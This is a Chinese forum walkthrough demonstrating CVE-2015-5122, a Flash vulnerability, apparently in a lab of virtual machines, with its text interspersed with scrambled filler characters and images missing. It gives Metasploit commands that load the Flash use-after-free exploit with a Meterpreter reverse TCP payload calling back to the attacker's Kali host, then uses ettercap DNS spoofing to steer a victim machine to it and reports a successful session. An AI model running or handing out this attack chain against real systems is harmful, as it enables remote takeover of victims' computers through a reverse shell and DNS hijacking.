cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

9 ~8 n R8 E" w 二、cve2015-5122漏洞实例演示虚拟机 ( W& {7 R& K8 h& |3 w6 y

! B8 R7 [* S6 z5 d; R5 [* {7 @ 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： : s0 }5 C" o! Y; F# i$ k

7 V, N7 P( F" r2 \+ B search cve-2015-5122如图： 4 h- p% K! x+ @! q) h* O Z

0 x( @& I" i& E . u6 L: w% X; B

& E0 J' d3 L7 @9 m4 S 下面我们敲如下命令： , h6 G' _+ g3 E3 }# a' }

! A" I x& R6 U: L4 \4 c- |4 ^ use exploit/multi/browser/adobe_flash_opaque_background_uaf 6 \- {& O; W3 `( S: d

9 m9 e9 A! n" X4 v set PAYLOAD windows/meterpreter/reverse_tcp ; @6 r T- f- \8 J

% Q& h0 j* ]. ~/ Z1 F set LHOST 192.168.0.109 4 a) X2 l6 A7 C$ f+ ^% S. ^

" ~$ l, X/ I6 e& K+ o set URIPATH / /*根目录*/ 7 k9 s( _* `7 R% t% W6 E

# I9 ~* ` T6 ^# M set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 9 A5 v1 h' C% N. C N6 l4 i

: `1 m' B: i! S& G9 F" C set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 3 q' i( \8 Y% R0 N8 }% B

% B) l$ H$ X: M8 {( O* W 然后show options如图： ) S3 H% G6 T2 |( ?% {6 r

* ?: X0 V7 Q7 T* J! C% F7 R & ?/ T( }% a" E+ x! I1 d* T: ?6 D

. D8 k( h( w( Q9 k. _! m 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
; _/ j& L; O- O& U5 z' ?* Q* u) X3 e # ~% V; b! p R8 P

" J) y2 a# Z! @# n" }) E+ p 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 / T. j; u7 p- O/ h2 [( }/ D, o0 S

! _7 q; w& R7 b+ t* ]6 S0 b Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 7 Y4 W+ d A Z/ m( h0 g% Z7 j

% \; |; v- Q% P* H+ L6 R" @# G * S- V0 S0 [' H: w e9 S

9 ?- W% F g, V- S x 成功了，这时候我们断开ettercap，如图： 0 W" x+ I) O1 Q6 v9 Q5 p

5 ]0 {/ K, y$ U4 U2 ? 2 T. E6 T! d& q& L& V* K

3 W/ Z# D# @+ a9 k+ r$ P+ a; P6 p Screenshot如图： - ^0 q8 W1 Z) \9 l" E6 L6 x' D

2 j; z, _! Y( g& w0 _$ E ) o2 k! \* d$ O. I) Z$ I( I

9 c' j4 V! g1 o" @8 y7 a - Z# Z8 K8 m( n2 K# A- D5 g

		自动登录	找回密码
密码			立即注册